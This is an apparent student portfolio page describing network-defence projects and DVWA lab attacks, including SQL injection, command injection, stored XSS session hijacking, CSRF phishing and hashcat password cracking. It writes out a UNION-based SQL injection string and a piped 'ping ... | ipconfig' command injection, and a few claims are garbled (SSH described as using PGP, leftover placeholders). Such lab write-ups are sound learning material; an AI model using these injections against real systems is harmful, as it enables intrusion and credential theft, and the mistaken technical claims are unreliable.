          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
